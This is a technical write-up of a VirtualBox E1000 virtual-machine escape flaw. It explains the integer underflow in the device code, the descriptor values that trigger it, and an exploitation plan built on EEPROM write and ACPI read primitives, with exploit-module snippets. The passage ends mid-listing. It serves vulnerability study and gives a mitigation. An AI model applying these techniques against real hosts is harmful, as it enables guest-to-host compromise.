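VirtualBox 0day VM Escape Vulnerability Published on GitHub
Not long ago, full details of a VirtualBox virtual machine escape vulnerability were published on GitHub. The author says they like VirtualBox but strongly disagree with the current state of information security, bug bounty programs in particular. The author lists four grievances: 1. Long delays: a submitted vulnerability can take half a year to go through the whole process. 2. Shifting decisions: what is agreed today may be reversed tomorrow. 3. The list of software in scope is imprecise. 4. Too much marketing. The author's response is full disclosure: publish every vulnerability found as a 0day, in the belief that this pushes information security forward. (This is not the position of the editor or of Anquanke.)
As far as we can tell, the author has not sold the vulnerability and simply released it.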
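Basic vulnerability information
Affected versions: VirtualBox 5.2.20 and earlier
Host OS: any
Guest OS: any
VM configuration: default (network adapter Intel PRO/1000 MT Desktop (82540EM), attached in NAT mode)
Overview
The default virtual network device in VirtualBox is the 82540EM in NAT mode mentioned above, referred to below as E1000.
E1000 has a vulnerability that lets an attacker with root/administrator privileges in the guest escape to ring 3 on the host, and from there escalate to ring 0 by other means (via /dev/vboxdrv).
Mitigation
Change the VM's network adapter to PCnet or to Paravirtualized Network. If the adapter cannot be changed, switch the attachment mode from NAT to another mode (the former option is more secure).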
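Vulnerability details
E1000
To send network packets, a guest does what a physical machine does: it configures the network card and hands packets to it. A packet is a data link layer frame plus the higher-level headers. Packets handed to the adapter are wrapped in Tx descriptors (Tx means transmit). The Tx descriptor is a data structure described in the 82540EM datasheet (317453006EN.PDF, Revision 4.0); it carries metadata such as packet size, VLAN tag, and TCP/IP segmentation flags.
The 82540EM datasheet specifies three Tx descriptor types: legacy, context, and data. Legacy is essentially deprecated; the other two are used together. What matters here is that a context descriptor sets the maximum packet size and switches TCP/IP segmentation on or off, while a data descriptor holds the physical address and size of the packet data. The size in a data descriptor must be smaller than the maximum packet size set by the context descriptor, and the context descriptor is normally submitted to the card before the data descriptors.
To submit Tx descriptors to the card, the guest writes them into the Tx Ring, a ring buffer in physical memory at a predefined address. Once all descriptors are in the Tx Ring, the guest updates the E1000 MMIO TDT register to tell the host that there are new descriptors to process.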
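The ring-and-tail handshake described above can be modeled in plain C. This is only a sketch under stated assumptions: `fake_nic_t`, `RING_ENTRIES` and `submit_descriptors` are hypothetical names, the ring lives in ordinary memory rather than guest-physical memory, and the `tdt` field merely stands in for the MMIO register.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define RING_ENTRIES 8u            /* hypothetical ring size for this sketch */

/* A Tx descriptor occupies 16 bytes; its fields are left opaque here. */
typedef struct { uint8_t raw[16]; } tx_desc_t;

typedef struct {
    tx_desc_t ring[RING_ENTRIES];  /* stands in for the Tx Ring in guest memory */
    uint32_t  tdt;                 /* stands in for the MMIO TDT (tail) register */
} fake_nic_t;

/* Copy n descriptors into the ring, then publish the new tail in one write. */
static void submit_descriptors(fake_nic_t *nic, const tx_desc_t *descs, uint32_t n)
{
    assert(n < RING_ENTRIES);      /* keep one slot free so the ring never looks empty */
    uint32_t tail = nic->tdt;
    for (uint32_t i = 0; i < n; i++) {
        memcpy(&nic->ring[tail], &descs[i], sizeof(tx_desc_t));
        tail = (tail + 1) % RING_ENTRIES;   /* the ring wraps around */
    }
    nic->tdt = tail;               /* in the real device this write triggers processing */
}
```

The point of the model is the ordering: all descriptors are in place before the single tail update, so the host sees the whole batch at once.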
Input
Consider the following array of Tx descriptors:
[context_1, data_2, data_3, context_4, data_5]
and assume their fields are set as follows:
context_1.header_length = 0
context_1.maximum_segment_size = 0x3010
context_1.tcp_segmentation_enabled = true
data_2.data_length = 0x10
data_2.end_of_packet = false
data_2.tcp_segmentation_enabled = true
data_3.data_length = 0
data_3.end_of_packet = true
data_3.tcp_segmentation_enabled = true
context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true
data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true
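The following sections analyze how these descriptors are processed.
Root cause analysis
Processing [context_1, data_2, data_3]
Assume the descriptors above are written to the Tx Ring in the given order and the TDT register is updated. The host then executes e1kXmitPending in src/VBox/Devices/Network/DevE1000.cpp.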
static int e1kXmitPending(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
while (!pThis->fLocked && e1kTxDLazyLoad(pThis))
{
while (e1kLocateTxPacket(pThis))
{
fIncomplete = false;
rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
if (RT_FAILURE(rc))
goto out;
rc = e1kXmitPacket(pThis, fOnWorkerThread);
if (RT_FAILURE(rc))
goto out;
}
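e1kTxDLazyLoad reads all 5 Tx descriptors from the Tx Ring, and then e1kLocateTxPacket is called. That function walks the descriptors to set up state but does not actually process them. Its first call handles context_1, data_2 and data_3. The remaining two descriptors are handled in the second iteration of the while loop (covered in the next section). This two-phase processing is essential for triggering the vulnerability.
e1kLocateTxPacket looks like this: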
static bool e1kLocateTxPacket(PE1KSTATE pThis)
{
...
for (int i = pThis->iTxDCurrent; i < pThis->nTxDFetched; ++i)
{
E1KTXDESC *pDesc = &pThis->aTxDescriptors[i];
switch (e1kGetDescType(pDesc))
{
case E1K_DTYP_CONTEXT:
e1kUpdateTxContext(pThis, pDesc);
continue;
case E1K_DTYP_LEGACY:
...
break;
case E1K_DTYP_DATA:
if (!pDesc->data.u64BufAddr || !pDesc->data.cmd.u20DTALEN)
break;
...
break;
default:
AssertMsgFailed(("Impossible descriptor type!"));
}
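context_1 is E1K_DTYP_CONTEXT, so e1kUpdateTxContext is called. It updates the TCP segmentation context if the descriptor has TCP segmentation enabled, which is the case here.
data_2 is E1K_DTYP_DATA; what is done for it is not relevant here, so it is not discussed.
data_3 is also E1K_DTYP_DATA, but since data_3.data_length == 0 nothing is done for it.
At this point three descriptors have been handled and two remain. After the switch statement, the descriptor's end_of_packet field is checked. For data_3 it is true, so the function does some work and returns.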
if (pDesc->legacy.cmd.fEOP)
{
...
return true;
}
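Had data_3.end_of_packet been false, the function would have gone on to handle the remaining two descriptors in the same call, and the vulnerability would not be triggered. The reason is explained below.
When e1kLocateTxPacket returns, the first three descriptors are ready to be unpacked and sent. The inner loop of e1kXmitPending then calls e1kXmitPacket, which iterates over the fetched descriptors (5 in this case).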
static int e1kXmitPacket(PE1KSTATE pThis, bool fOnWorkerThread)
{
...
while (pThis->iTxDCurrent < pThis->nTxDFetched)
{
E1KTXDESC *pDesc = &pThis->aTxDescriptors[pThis->iTxDCurrent];
...
rc = e1kXmitDesc(pThis, pDesc, e1kDescAddr(TDBAH, TDBAL, TDH), fOnWorkerThread);
...
if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
break;
}
e1kXmitDesc is called for each descriptor.
static int e1kXmitDesc(PE1KSTATE pThis, E1KTXDESC *pDesc, RTGCPHYS addr,
bool fOnWorkerThread)
{
...
switch (e1kGetDescType(pDesc))
{
case E1K_DTYP_CONTEXT:
...
break;
case E1K_DTYP_DATA:
{
...
if (pDesc->data.cmd.u20DTALEN == 0 || pDesc->data.u64BufAddr == 0)
{
E1kLog2(("% Empty data descriptor, skipped.\n", pThis->szPrf));
}
else
{
if (e1kXmitIsGsoBuf(pThis->CTX_SUFF(pTxSg)))
{
...
}
else if (!pDesc->data.cmd.fTSE)
{
...
}
else
{
STAM_COUNTER_INC(&pThis->StatTxPathFallback);
rc = e1kFallbackAddToFrame(pThis, pDesc, fOnWorkerThread);
}
}
...
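The first descriptor passed to this function is context_1; the function does nothing with it.
The second descriptor passed is data_2. Because every data descriptor here has tcp_segmentation_enabled == true (pDesc->data.cmd.fTSE), e1kFallbackAddToFrame is called. This is the function in which the integer underflow later occurs when data_5 is processed.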
static int e1kFallbackAddToFrame(PE1KSTATE pThis, E1KTXDESC *pDesc, bool fOnWorkerThread)
{
...
uint16_t u16MaxPktLen = pThis->contextTSE.dw3.u8HDRLEN + pThis->contextTSE.dw3.u16MSS;
/*
* Carve out segments.
*/
int rc = VINF_SUCCESS;
do
{
/* Calculate how many bytes we have left in this TCP segment */
uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
if (cb > pDesc->data.cmd.u20DTALEN)
{
/* This descriptor fits completely into current segment */
cb = pDesc->data.cmd.u20DTALEN;
rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
}
else
{
...
}
pDesc->data.u64BufAddr += cb;
pDesc->data.cmd.u20DTALEN -= cb;
} while (pDesc->data.cmd.u20DTALEN > 0 && RT_SUCCESS(rc));
if (pDesc->data.cmd.fEOP)
{
...
pThis->u16TxPktLen = 0;
...
}
return VINF_SUCCESS; /// @todo consider rc;
}
The important variables here are u16MaxPktLen, pThis->u16TxPktLen and pDesc->data.cmd.u20DTALEN.
The table below shows their values before and after e1kFallbackAddToFrame runs for each data descriptor.
Tx Descriptor | Before/After | u16MaxPktLen | pThis->u16TxPktLen | pDesc->data.cmd.u20DTALEN |
---|---|---|---|---|
data_2 | Before | 0x3010 | 0 | 0x10 |
– | After | 0x3010 | 0x10 | 0 |
data_3 | Before | 0x3010 | 0x10 | 0 |
– | After | 0x3010 | 0x10 | 0 |
Note that when data_3 is processed, pThis->u16TxPktLen is 0x10.
Next, look again at the end of e1kXmitPacket.
if (e1kGetDescType(pDesc) != E1K_DTYP_CONTEXT && pDesc->legacy.cmd.fEOP)
break;
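Because data_3 is not E1K_DTYP_CONTEXT and data_3.end_of_packet == true, the loop breaks even though the last two descriptors have not been processed. This matters because data descriptors are always processed after context descriptors: context descriptors are applied when the TCP segmentation context is updated in e1kLocateTxPacket, and data descriptors are processed afterwards in the loop inside e1kXmitPacket. The developers intended this ordering to keep u16MaxPktLen from changing while data is being processed, and so to prevent an integer underflow in the following statement.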
uint32_t cb = u16MaxPktLen - pThis->u16TxPktLen;
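This protection can be bypassed, however. In e1kLocateTxPacket, data_3.end_of_packet == true forces the function to return, leaving two descriptors pending. At that point pThis->u16TxPktLen is 0x10 rather than 0, so context_4.maximum_segment_size can be used to change u16MaxPktLen and cause the integer underflow.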
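The two-phase processing and the state carried between phases can be reproduced with a small model. This is a simplified sketch, not the VirtualBox code: `desc_t`, `model_t`, `locate_packet`, `xmit_packet` and `run_model` are hypothetical names, only the "descriptor fits completely" branch is modeled, and the actual copy is replaced by recording the length that would be copied.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

typedef enum { DESC_CONTEXT, DESC_DATA } desc_kind_t;

typedef struct {
    desc_kind_t kind;
    uint8_t  hdr_len;    /* context descriptors only */
    uint16_t mss;        /* context descriptors only */
    uint32_t data_len;   /* data descriptors only */
    bool     eop;        /* data descriptors only */
} desc_t;

typedef struct {
    uint8_t  hdr_len;    /* models contextTSE.dw3.u8HDRLEN */
    uint16_t mss;        /* models contextTSE.dw3.u16MSS */
    uint16_t tx_pkt_len; /* models u16TxPktLen */
    int      cur;        /* models iTxDCurrent */
    uint32_t max_copy;   /* largest length handed to the copy step */
} model_t;

/* Phase 1: apply context descriptors; stop at the first data descriptor with EOP. */
static bool locate_packet(model_t *m, const desc_t *d, int n)
{
    for (int i = m->cur; i < n; i++) {
        if (d[i].kind == DESC_CONTEXT) {
            m->hdr_len = d[i].hdr_len;
            m->mss = d[i].mss;
            continue;
        }
        if (d[i].eop)
            return true;
    }
    return false;
}

/* Phase 2: consume descriptors up to and including the EOP data descriptor. */
static void xmit_packet(model_t *m, const desc_t *d, int n)
{
    while (m->cur < n) {
        const desc_t *p = &d[m->cur++];
        if (p->kind != DESC_DATA)
            continue;
        if (p->data_len != 0) {                /* empty data descriptors are skipped */
            uint16_t max_pkt_len = (uint16_t)(m->hdr_len + m->mss);
            uint32_t cb = max_pkt_len - m->tx_pkt_len; /* wraps if tx_pkt_len is larger */
            assert(cb > p->data_len);          /* only the "fits completely" branch is modeled */
            cb = p->data_len;
            if (cb > m->max_copy)
                m->max_copy = cb;
            m->tx_pkt_len = (uint16_t)(m->tx_pkt_len + cb);
            if (p->eop)
                m->tx_pkt_len = 0;             /* reset happens only on a non-empty EOP descriptor */
        }
        if (p->eop)
            break;
    }
}

/* Alternate the two phases, as the loop in e1kXmitPending does. */
static uint32_t run_model(const desc_t *d, int n)
{
    model_t m = {0};
    while (locate_packet(&m, d, n))
        xmit_packet(&m, d, n);
    return m.max_copy;
}
```

Fed the five descriptors from the Input section, the model reports a copy length of 0x4188: the empty data_3 ends the first packet without resetting the running length, so the second context descriptor takes effect while 0x10 bytes are still accounted for.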
Processing [context_4, data_5]
Back in the loop of e1kXmitPending:
while (e1kLocateTxPacket(pThis))
{
fIncomplete = false;
rc = e1kXmitAllocBuf(pThis, pThis->fGSO);
if (RT_FAILURE(rc))
goto out;
rc = e1kXmitPacket(pThis, fOnWorkerThread);
if (RT_FAILURE(rc))
goto out;
}
This time e1kLocateTxPacket sets up context_4 and data_5. We can set context_4.maximum_segment_size to a value smaller than the amount of data already read (0x10).
context_4.header_length = 0
context_4.maximum_segment_size = 0xF
context_4.tcp_segmentation_enabled = true
data_5.data_length = 0x4188
data_5.end_of_packet = true
data_5.tcp_segmentation_enabled = true
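During this call to e1kLocateTxPacket the maximum segment size becomes 0xF, while the amount of data already read is 0x10.
When data_5 is processed, the variables on entry to e1kFallbackAddToFrame are: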
Tx Descriptor | Before/After | u16MaxPktLen | pThis->u16TxPktLen | pDesc->data.cmd.u20DTALEN |
---|---|---|---|---|
data_5 | Before | 0xF | 0x10 | 0x4188 |
– | After | – | – | – |
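This causes an integer underflow: u16MaxPktLen - pThis->u16TxPktLen = 0xF - 0x10, which becomes 0xFFFFFFFF when stored in the uint32_t cb.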
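The wrap-around itself follows from C's integer promotion rules and can be checked in isolation. The sketch below assumes a platform with 32-bit int; `bytes_left` mirrors the subtraction from the listing, while `bytes_left_checked` is a hypothetical guarded variant shown only for contrast, not the vendor's fix.

```c
#include <assert.h>
#include <stdint.h>

/* Bytes left in the current segment, computed the same way as in the listing. */
static uint32_t bytes_left(uint16_t max_pkt_len, uint16_t tx_pkt_len)
{
    /* Both operands are promoted to int, so 0xF - 0x10 is -1;
     * converting -1 to uint32_t yields 0xFFFFFFFF. */
    return (uint32_t)(max_pkt_len - tx_pkt_len);
}

/* Guarded variant (hypothetical): report failure instead of wrapping. */
static int bytes_left_checked(uint16_t max_pkt_len, uint16_t tx_pkt_len, uint32_t *out)
{
    assert(out != 0);
    if (tx_pkt_len > max_pkt_len)
        return -1;
    *out = (uint32_t)(max_pkt_len - tx_pkt_len);
    return 0;
}
```

With the values from the table, `bytes_left(0xF, 0x10)` returns 0xFFFFFFFF, whereas the guarded variant rejects the same input.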
Since 0xFFFFFFFF > 0x4188, the following branch is taken:
if (cb > pDesc->data.cmd.u20DTALEN)
{
cb = pDesc->data.cmd.u20DTALEN;
rc = e1kFallbackAddSegment(pThis, pDesc->data.u64BufAddr, cb, pDesc->data.cmd.fEOP /*fSend*/, fOnWorkerThread);
}
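e1kFallbackAddSegment is therefore called with a size of 0x4188. Without the vulnerability the size could never exceed 0x4000, because e1kUpdateTxContext checks that the maximum segment size is at most 0x4000 when it updates the TCP segmentation context.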
DECLINLINE(void) e1kUpdateTxContext(PE1KSTATE pThis, E1KTXDESC *pDesc)
{
...
uint32_t cbMaxSegmentSize = pThis->contextTSE.dw3.u16MSS + pThis->contextTSE.dw3.u8HDRLEN + 4; /*VTAG*/
if (RT_UNLIKELY(cbMaxSegmentSize > E1K_MAX_TX_PKT_SIZE))
{
pThis->contextTSE.dw3.u16MSS = E1K_MAX_TX_PKT_SIZE - pThis->contextTSE.dw3.u8HDRLEN - 4; /*VTAG*/
...
}
Buffer overflow
Once e1kFallbackAddSegment has been called with size 0x4188, there are two ways to exploit it. First, data is read from the guest into a heap buffer:
static int e1kFallbackAddSegment(PE1KSTATE pThis, RTGCPHYS PhysAddr, uint16_t u16Len, bool fSend, bool fOnWorkerThread)
{
...
PDMDevHlpPhysRead(pThis->CTX_SUFF(pDevIns), PhysAddr,
pThis->aTxPacketFallback + pThis->u16TxPktLen, u16Len);
Here pThis->aTxPacketFallback is a buffer of size 0x3FA0 and u16Len is 0x4188, so the read overflows the buffer and can, for example, overwrite function pointers.
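How far the write runs past the buffer follows directly from the numbers in this walkthrough. The helper below is a hypothetical illustration; `FALLBACK_BUF_SIZE` takes the 0x3FA0 figure quoted in the text, and the offset corresponds to pThis->u16TxPktLen at the time of the copy.

```c
#include <assert.h>
#include <stddef.h>

#define FALLBACK_BUF_SIZE 0x3FA0u  /* size of aTxPacketFallback as stated in the text */

/* Number of bytes written past the end of the buffer, or 0 if the write fits. */
static size_t bytes_past_end(size_t offset, size_t len)
{
    assert(offset <= FALLBACK_BUF_SIZE);
    size_t room = FALLBACK_BUF_SIZE - offset;
    return len > room ? len - room : 0;
}
```

For the case analyzed here (offset 0x10, length 0x4188) the helper returns 0x1F8, the number of bytes that land beyond the array.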
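Second, e1kFallbackAddSegment calls e1kTransmitFrame, which, given a suitable E1000 register configuration, calls e1kHandleRxPacket. That function allocates a stack buffer of size 0x4000 and copies data of the given length (0x4188 here) into it.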
static int e1kHandleRxPacket(PE1KSTATE pThis, const void *pvBuf, size_t cb, E1KRXDST status)
{
#if defined(IN_RING3)
uint8_t rxPacket[E1K_MAX_RX_PKT_SIZE];
...
if (status.fVP)
{
...
}
else
memcpy(rxPacket, pvBuf, cb);
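Either of the two overflows can be used for exploitation.
Exploit
The exploit is a Linux kernel module (LKM) loaded into the guest OS. On Windows it would need a driver that differs only slightly from the LKM.
Loading a driver requires elevated privileges on both operating systems, but this is usually not a serious obstacle; the same situation has come up regularly at Pwn2Own in recent years.
The exploit is very reliable and does not fail for obscure reasons. It works on Ubuntu 16.04 and 18.04 x86_64 guests with the default configuration.
Exploitation steps
1. The attacker unloads e1000.ko, which is loaded by default in Linux guests, and loads the exploit LKM.
2. The LKM initializes E1000 according to the datasheet; only the transmit half needs to be initialized.
3.1. The LKM disables E1000 loopback mode so that the stack buffer overflow code is unreachable.
3.2. The LKM uses the vulnerability to overflow the heap buffer.
3.3. The heap overflow makes it possible to use the E1000 EEPROM to write any two bytes within a 128 KB range relative to the heap buffer, which gives the attacker a write primitive.
3.4. The LKM uses the write primitive 8 times to write into an ACPI (Advanced Configuration and Power Interface) data structure on the heap. The bytes are written to the index variable of a heap buffer from which a single byte is then read. Because the buffer is smaller than the maximum index value (255), the attacker can read past the buffer, which gives a read primitive.
3.5. The LKM uses the read primitive 8 times, accessing ACPI to read 8 bytes from the heap: a pointer into the VBoxDD.so shared library.
3.6. The LKM subtracts the RVA from the pointer to obtain the VBoxDD.so image base.
4.1. The LKM enables E1000 loopback mode so that the stack buffer overflow code is reachable.
4.2. The LKM uses the vulnerability to overflow the stack buffer; the saved return address (RIP/EIP) is overwritten and the attacker gains control of execution.
4.3. A ROP chain is used to execute the shellcode.
5.1. The shellcode loader copies the shellcode from the stack and executes it.
5.2. The shellcode uses the fork and execve system calls to spawn a process.
6. The attacker unloads the LKM and reloads e1000.ko, which restores networking.
Initialization
The LKM maps the physical memory of the E1000 MMIO region. The physical address and size are preset by the hypervisor.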
void* map_mmio(void) {
off_t pa = 0xF0000000;
size_t len = 0x20000;
void* va = ioremap(pa, len);
if (!va) {
printk(KERN_INFO PFX"ioremap failed to map MMIO\n");
return NULL;
}
return va;
}
Next it configures the E1000 general-purpose registers, allocates memory for the Tx Ring, and configures the transmit registers.
void e1000_init(void* mmio) {
// Configure general purpose registers
configure_CTRL(mmio);
// Configure TX registers
g_tx_ring = kmalloc(MAX_TX_RING_SIZE, GFP_KERNEL);
if (!g_tx_ring) {
printk(KERN_INFO PFX"Failed to allocate TX Ring\n");
return;
}
configure_TDBAL(mmio);
configure_TDBAH(mmio);
configure_TDLEN(mmio);
configure_TCTL(mmio);
}
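Bypassing ASLR
Write primitive
When writing the exploit I decided not to use primitives that live in services disabled by default, such as the Chromium service that provides 3D acceleration (more than 40 vulnerabilities were found in it last year).
The task, then, was to find an information leak in the subsystems VirtualBox enables by default. The obvious idea is that once the integer underflow overflows the heap buffer, we control what lies past the buffer, and from that we can derive read, write, and information-leak primitives.
Let's look closely at what the heap overflow reaches: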
/**
* Device state structure.
*/
struct E1kState_st
{
...
uint8_t aTxPacketFallback[E1K_MAX_TX_PKT_SIZE];
...
E1kEEPROM eeprom;
...
}
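Here aTxPacketFallback is the 0x3FA0-byte buffer that gets overflowed. Looking at what follows it, we find an interesting structure, E1kEEPROM, which contains another structure with the following fields: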
/**
* 93C46-compatible EEPROM device emulation.
*/
struct EEPROM93C46
{
...
bool m_fWriteEnabled;
uint8_t Alignment1;
uint16_t m_u16Word;
uint16_t m_u16Mask;
uint16_t m_u16Addr;
uint32_t m_u32InternalWires;
...
}
E1000 implements an EEPROM, a secondary memory of the adapter, which the guest can access through E1000 MMIO registers. We are only interested in the EEPROM's write operation:
EEPROM93C46::State EEPROM93C46::opWrite()
{
storeWord(m_u16Addr, m_u16Word);
return WAITING_CS_FALL;
}
void EEPROM93C46::storeWord(uint32_t u32Addr, uint16_t u16Value)
{
if (m_fWriteEnabled) {
E1kLog(("EEPROM: Stored word %04x at %08x\n", u16Value, u32Addr));
m_au16Data[u32Addr] = u16Value;
}
m_u16Mask = DATA_MSB;
}
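Here m_u16Addr, m_u16Word and m_fWriteEnabled are fields of the EEPROM93C46 structure, all of which we control. The statement
m_au16Data[u32Addr] = u16Value;
writes two bytes at an arbitrary 16-bit offset from m_au16Data. This is our write primitive.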
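Why a 16-bit word index gives a 128 KB reach can be seen in a flat-memory model of the store. This is a sketch under stated assumptions: `eeprom_model_t`, `store_word` and `max_reach_bytes` are hypothetical names, and the oversized `words` array stands in for the real 64-word EEPROM array plus whatever happens to follow it on the heap, so that the model itself stays within bounds.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

#define EEPROM_WORDS 64u   /* a 93C46 holds 64 16-bit words */

typedef struct {
    uint16_t words[0x10000]; /* first EEPROM_WORDS entries model m_au16Data,
                                the rest models the memory after it */
    bool     write_enabled;  /* models m_fWriteEnabled */
    uint16_t addr;           /* models m_u16Addr */
    uint16_t word;           /* models m_u16Word */
} eeprom_model_t;

/* Same shape as storeWord(): the index is never compared with EEPROM_WORDS. */
static void store_word(eeprom_model_t *e)
{
    assert(e != NULL);
    if (e->write_enabled)
        e->words[e->addr] = e->word;
}

/* A 16-bit index over 2-byte elements spans 0x10000 * 2 bytes = 128 KB. */
static uint32_t max_reach_bytes(void)
{
    return 0x10000u * (uint32_t)sizeof(uint16_t);
}
```

Once the overflow has set the three fields, each EEPROM write operation stores one attacker-chosen word anywhere in that 128 KB window.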
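Read primitive
The next problem is finding data structures on the heap to write into, with the goal of leaking a shared library pointer. No heap spraying is needed, because the main data structures of the virtual devices are allocated from an internal hypervisor heap and the distances between them are constant.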
When a VM starts, the PDM (Pluggable Device and Driver Manager) subsystem allocates PDMDEVINS objects in the hypervisor heap.
int pdmR3DevInit(PVM pVM)
{
...
PPDMDEVINS pDevIns;
if (paDevs[i].pDev->pReg->fFlags & (PDM_DEVREG_FLAGS_RC | PDM_DEVREG_FLAGS_R0))
rc = MMR3HyperAllocOnceNoRel(pVM, cb, 0, MM_TAG_PDM_DEVICE, (void **)&pDevIns);
else
rc = MMR3HeapAllocZEx(pVM, MM_TAG_PDM_DEVICE, cb, (void **)&pDevIns);
...
Tracing this code under GDB gives the following output:
[trace-device-constructors] Constructing a device #0x0:
[trace-device-constructors] Name: "pcarch", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f125a "PC Architecture Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d57517b <pcarchConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c1b0
[trace-device-constructors] Data size: 0x8
[trace-device-constructors] Constructing a device #0x1:
[trace-device-constructors] Name: "pcbios", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6ef37b "PC BIOS Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d56bd3b <pcbiosConstruct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc45486c720
[trace-device-constructors] Data size: 0x11e8
...
[trace-device-constructors] Constructing a device #0xe:
[trace-device-constructors] Name: "e1000", '\000' <repeats 26 times>
[trace-device-constructors] Description: 0x7fc44d70c6d0 "Intel PRO/1000 MT Desktop Ethernet.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d622969 <e1kR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470083400
[trace-device-constructors] Data size: 0x53a0
[trace-device-constructors] Constructing a device #0xf:
[trace-device-constructors] Name: "ichac97", '\000' <repeats 24 times>
[trace-device-constructors] Description: 0x7fc44d716ac0 "ICH AC'97 Audio Controller"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d66a90f <ichac97R3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc470088b00
[trace-device-constructors] Data size: 0x1848
[trace-device-constructors] Constructing a device #0x10:
[trace-device-constructors] Name: "usb-ohci", '\000' <repeats 23 times>
[trace-device-constructors] Description: 0x7fc44d707025 "OHCI USB controller.\n"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d5ea841 <ohciR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008a4e0
[trace-device-constructors] Data size: 0x1728
[trace-device-constructors] Constructing a device #0x11:
[trace-device-constructors] Name: "acpi", '\000' <repeats 27 times>
[trace-device-constructors] Description: 0x7fc44d6eced8 "Advanced Configuration and Power Interface"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d563431 <acpiR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008be70
[trace-device-constructors] Data size: 0x1570
[trace-device-constructors] Constructing a device #0x12:
[trace-device-constructors] Name: "GIMDev", '\000' <repeats 25 times>
[trace-device-constructors] Description: 0x7fc44d6f17fa "VirtualBox GIM Device"
[trace-device-constructors] Constructor: {int (PPDMDEVINS, int, PCFGMNODE)} 0x7fc44d575cde <gimdevR3Construct(PPDMDEVINS, int, PCFGMNODE)>
[trace-device-constructors] Instance: 0x7fc47008dba0
[trace-device-constructors] Data size: 0x90
[trace-device-constructors] Instances:
[trace-device-constructors] #0x0 Address: 0x7fc45486c1b0
[trace-device-constructors] #0x1 Address 0x7fc45486c720 differs from previous by 0x570
[trace-device-constructors] #0x2 Address 0x7fc4700685f0 differs from previous by 0x1b7fbed0
[trace-device-constructors] #0x3 Address 0x7fc4700696d0 differs from previous by 0x10e0
[trace-device-constructors] #0x4 Address 0x7fc47006a0d0 differs from previous by 0xa00
[trace-device-constructors] #0x5 Address 0x7fc47006a450 differs from previous by 0x380
[trace-device-constructors] #0x6 Address 0x7fc47006a920 differs from previous by 0x4d0
[trace-device-constructors] #0x7 Address 0x7fc47006ad50 differs from previous by 0x430
[trace-device-constructors] #0x8 Address 0x7fc47006b240 differs from previous by 0x4f0
[trace-device-constructors] #0x9 Address 0x7fc4548ec9a0 differs from previous by 0x-1b77e8a0
[trace-device-constructors] #0xa Address 0x7fc470075f90 differs from previous by 0x1b7895f0
[trace-device-constructors] #0xb Address 0x7fc488022000 differs from previous by 0x17fac070
[trace-device-constructors] #0xc Address 0x7fc47007cf80 differs from previous by 0x-17fa5080
[trace-device-constructors] #0xd Address 0x7fc4700820f0 differs from previous by 0x5170
[trace-device-constructors] #0xe Address 0x7fc470083400 differs from previous by 0x1310
[trace-device-constructors] #0xf Address 0x7fc470088b00 differs from previous by 0x5700
[trace-device-constructors] #0x10 Address 0x7fc47008a4e0 differs from previous by 0x19e0
[trace-device-constructors] #0x11 Address 0x7fc47008be70 differs from previous by 0x1990
[trace-device-constructors] #0x12 Address 0x7fc47008dba0 differs from previous by 0x1d30
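The E1000 device is at position #0xE. The devices after it follow at offsets of 0x5700, 0x19E0, and so on; as noted above, these distances are the same on every run.
After E1000 come ICH AC'97, OHCI, ACPI and VirtualBox GIM.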
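The distance from the E1000 instance to the ACPI instance can be cross-checked from the trace in two ways: by summing the reported gaps and by subtracting the two instance addresses. The constants below are copied from that one trace and the function name `sum_gaps` is hypothetical; the absolute addresses change under ASLR, and only the difference is expected to stay the same.

```c
#include <assert.h>
#include <stdint.h>

/* Instance addresses copied from the trace (one particular run). */
static const uint64_t E1000_INSTANCE = 0x7fc470083400ULL;
static const uint64_t ACPI_INSTANCE  = 0x7fc47008be70ULL;

/* Gaps reported by the trace for E1000 -> AC'97 -> OHCI -> ACPI. */
static const uint64_t GAPS[] = { 0x5700, 0x19e0, 0x1990 };

static uint64_t sum_gaps(const uint64_t *gaps, int n)
{
    assert(gaps != 0 && n >= 0);
    uint64_t total = 0;
    for (int i = 0; i < n; i++)
        total += gaps[i];
    return total;
}
```

Both computations give 0x8A70 for this trace, which is the kind of fixed offset the exploit depends on.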
The ACPI device is created at VM startup (src/VBox/Devices/PC/DevACPI.cpp):
typedef struct ACPIState
{
...
uint8_t au8SMBusBlkDat[32];
uint8_t u8SMBusBlkIdx;
uint32_t uPmTimeOld;
uint32_t uPmTimeA;
uint32_t uPmTimeB;
uint32_t Alignment5;
} ACPIState;
The ACPI I/O port handler is registered for the range 0x4100-0x410F. For port 0x4107 it does the following:
PDMBOTHCBDECL(int) acpiR3SMBusRead(PPDMDEVINS pDevIns, void *pvUser, RTIOPORT Port, uint32_t *pu32, unsigned cb)
{
RT_NOREF1(pDevIns);
ACPIState *pThis = (ACPIState *)pvUser;
...
switch (off)
{
...
case SMBBLKDAT_OFF:
*pu32 = pThis->au8SMBusBlkDat[pThis->u8SMBusBlkIdx];
